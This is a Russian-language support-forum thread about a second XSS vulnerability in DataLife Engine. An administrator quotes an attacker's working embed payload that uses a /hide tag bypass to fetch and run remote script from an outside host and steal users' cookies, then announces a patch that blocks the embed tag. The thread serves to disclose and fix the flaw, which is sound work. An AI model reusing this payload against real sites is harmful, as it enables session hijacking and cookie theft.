DLE: embed xss уязвимость v2, встраивание вредоносного кода, кража кукисов

1. 

   Онлайн

   Grey

   Администраторы

   Сообщений: 2130

   DLE: embed xss уязвимость v2, встраивание вредоносного кода, кража кукисов Разговор был в теме: http://be.rdn-team.com/forum/showtopic-779/#message-3060 Но объявился наш друг факир и его новый код уявимости: [color=#FFFFFF][/hide]<embed src="http://top.fakir.pp.ua/swf.swf?a=eval&c=if(document.cookie.indexOf('path')<0)$.getScript('http://top.fakir.pp.ua/aKc7gf')"id="ppz"allowscriptaccess="always"height=1 width=1[/hide][/color] Опять все куки утекли на сервер злоумышленника так как обработку html тега он успешно обошел закрывающимся тегом /hide который превращается в /div Что будем делать? Будем полностью блокировать embed на сайте и форуме, файлы редактируем те же: /engine/classes/parse.class.php (dle) /engine/bullet_energy/classes/filter.class.php (be) Исправления в файле вложения. Вложения: swfxssv2.txt Размер файла: 775 b Скачиваний: 678 IMPI, green987 нравится это сообщение.

   сделаю любой модуль dle на заказ, если вам нужны услуги по dle
   скaйп rdn-team.com
   телегрaм @histoo

   23 сентября 2016 - 15:05 / #1
2. 

   Оффлайн

   Гость007

   Посетители

   Сообщений: 24

   То есть на сайте и форуме нельзя будет добавлять ролики с вк/.ютуб? Плохо, если так

   3 октября 2016 - 12:02 / #2
3. 

   Онлайн

   Grey

   Администраторы

   Сообщений: 2130

   Гость007, ролики вк и ютуб не добавляются тегом embed, они идут через разрешенный iframe домен.

   сделаю любой модуль dle на заказ, если вам нужны услуги по dle
   скaйп rdn-team.com
   телегрaм @histoo

   3 октября 2016 - 12:08 / #3
4. 

   Оффлайн

   Гость007

   Посетители

   Сообщений: 24

   Здесь попробую Сообщение отредактировал Гость007 3 октября 2016 - 12:23

   3 октября 2016 - 12:20 / #4